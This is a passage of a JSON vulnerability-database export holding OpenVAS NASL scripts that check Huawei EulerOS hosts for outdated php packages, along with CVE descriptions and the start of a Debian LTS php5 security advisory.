value:\"2020-07-03 06:19:30 +0000 (Fri, 03 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 06:19:30 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2020-1747)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.6\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1747\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1747\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2020-1747 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11042)\n\nWhen PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11041)\n\nAn issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\ngd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\nThe Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding: chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\nexif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\nAn issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\nAn issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS Virtualization 3.0.6.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.6.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h30\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2438)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2017-9224", "CVE-2016-7414", "CVE-2017-12933", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9228", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2017-9229", "CVE-2015-8382", "CVE-2015-8867", "CVE-2016-7125", "CVE-2016-4543", "CVE-2016-4542", "CVE-2017-9227", "CVE-2016-4541", "CVE-2019-11041", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2019-11042", "CVE-2015-8835", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-6293", "CVE-2019-11040", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-7480", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-5589", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192438", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2438\");\n script_version(\"2020-01-23T12:56:51+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-5589\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8382\", \"CVE-2015-8835\", \"CVE-2015-8867\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6293\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-7480\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5712\", \"CVE-2019-11040\", \"CVE-2019-11041\", \"CVE-2019-11042\", \"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:56:51 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:56:51 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2438)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2438\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2438\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2438 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\nThe finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data. Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\next/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.(CVE-2016-7124)\n\nThe match function in pcre_exec.c in PCRE before 8.37 mishandles the /(?:((abcd))<pipe>(((?:(?:(?:(?:abc<pipe>(?:abcdef))))b)abcdefghi)abc)<pipe>((*ACCEPT)))/ pattern and related patterns involving (*ACCEPT), which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (partially initialized memory and application crash) via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror, aka ZDI-CAN-2547.(CVE-2015-8382)\n\nAn issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\nexif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\nThe SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data.(CVE-2016-7480)\n\next/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\nThe odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_ ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~42.h63\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:52", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2649)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2014-9767", "CVE-2017-9224", "CVE-2016-7414", "CVE-2017-12933", "CVE-2014-9912", "CVE-2016-6288", "CVE-2011-4718", "CVE-2017-9228", "CVE-2017-9226", "CVE-2016-4540", "CVE-2015-8879", "CVE-2016-9935", "CVE-2016-3185", "CVE-2018-10545", "CVE-2017-11143", "CVE-2018-5712", "CVE-2017-9229", "CVE-2016-7125", "CVE-2016-4543", "CVE-2016-4542", "CVE-2017-9227", "CVE-2016-4541", "CVE-2017-11628", "CVE-2017-7272", "CVE-2016-2554", "CVE-2018-14851", "CVE-2015-8835", "CVE-2017-16642", "CVE-2015-6833", "CVE-2016-4070", "CVE-2015-8874", "CVE-2016-6292", "CVE-2016-9934", "CVE-2015-4116", "CVE-2015-6831", "CVE-2017-11147", "CVE-2016-10159", "CVE-2016-7411", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-7124", "CVE-2016-7480", "CVE-2019-11043", "CVE-2016-6294", "CVE-2016-7128", "CVE-2015-8935", "CVE-2015-7803", "CVE-2016-7418", "CVE-2018-17082", "CVE-2015-8866", "CVE-2016-10161", "CVE-2015-5589", "CVE-2016-3141", "CVE-2018-10547", "CVE-2016-6291", "CVE-2016-10158", "CVE-2017-11144", "CVE-2015-6832", "CVE-2016-3142", "CVE-2018-5711", "CVE-2015-7804", "CVE-2016-7412"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192649", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2649\");\n script_version(\"2020-01-23T13:11:07+0000\");\n script_cve_id(\"CVE-2011-4718\", \"CVE-2014-9767\", \"CVE-2014-9912\", \"CVE-2015-4116\", \"CVE-2015-5589\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-7803\", \"CVE-2015-7804\", \"CVE-2015-8835\", \"CVE-2015-8866\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2015-8935\", \"CVE-2016-10158\", \"CVE-2016-10159\", \"CVE-2016-10161\", \"CVE-2016-10397\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-6288\", \"CVE-2016-6291\", \"CVE-2016-6292\", \"CVE-2016-6294\", \"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7128\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7418\", \"CVE-2016-7480\", \"CVE-2016-9934\", \"CVE-2016-9935\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\", \"CVE-2017-7272\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\", \"CVE-2018-10545\", \"CVE-2018-10547\", \"CVE-2018-14851\", \"CVE-2018-17082\", \"CVE-2018-5711\", \"CVE-2018-5712\", \"CVE-2019-11043\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:11:07 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:11:07 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-2649)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2649\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2649\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-2649 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\nAn issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\nAn issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~42.h51\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-23T21:28:26", "description": "Package : php5\nVersion : 5.4.45-0+deb7u9\nCVE ID : CVE-2016-10397 CVE-2017-11143 CVE-2017-11144\n CVE-2017-11145 CVE-2017-11147\n\nSeveral issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\n Incorrect handling of various URI components in the URL parser could\n be used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\n An invalid free in the WDDX deserialization of boolean parameters\n could be used by attackers able to inject XML for deserialization to\n crash the PHP interpreter.\n\nCVE-2017-11144\n The openssl extension PEM sealing code did not check the return value\n of the OpenSSL sealing function, which could lead to a crash of the\n PHP interpreter.\n\nCVE-2017-11145\n Lack of a bounds check in the date extension&#x27;s timelib_meridian\n parsing code could be used by attackers able to supply date strings to\n leak information from the interpreter.\n\nCVE-2017-11147\n The PHAR archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or potentially\n disclose information due to a buffer over-read in the\n phar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-07-21T11:45:57", "type": "debian", "title": "[SECURITY] [DLA 1034-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", 